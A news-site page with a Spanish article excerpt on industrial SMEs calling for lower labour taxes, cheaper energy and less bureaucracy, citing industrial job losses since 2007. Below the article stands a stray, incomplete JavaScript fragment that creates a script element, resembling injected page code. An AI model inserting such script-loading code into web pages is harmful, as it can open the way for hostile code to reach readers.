Notícies

Las pymes industriales piden espacio

Las pequeñas y medianas empresas industriales reclaman más protagonismo en la salida de la crisis

Tras el turismo y el sector agroalimentario, la industria es la actividad que más tira de la economía en esta etapa de la recuperación, pero quiere más. La mayoría son pequeñas y medianas empresas (pymes) que han estado al margen de la crisis de la burbuja inmobiliaria y han visto en la exportación el consuelo ante la débil demanda interna. Ahora que lo peor de la recesión ha quedado atrás reclaman un lugar más destacado para impulsar la reindustrialización con tres propuestas claras: bajar la carga fiscal al empleo, reducir el precio de la energía y simplificar la burocracia administrativa.

Entre el 2007 y el 2013 se destrucción algo más de 750.000 empleos en la industria, según se recoge en uno de los artículos del último número de Papeles de Economía Española, que edita Funcas. Su coautor, el catedrático de Economía de la Universidad Complutense, José Carlos Fariñas, abre el abanico temporal y subraya que desde 1995 hasta el 2014 se ha perdido en términos de empleo el 20% del tejido productivo. También se redujo el número de empresas (el 18,6%), especialmente las que cuentan con asalariados.

 Llegir tota la notícia aquí

var d=document;var s=d.createElement('script'); }

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>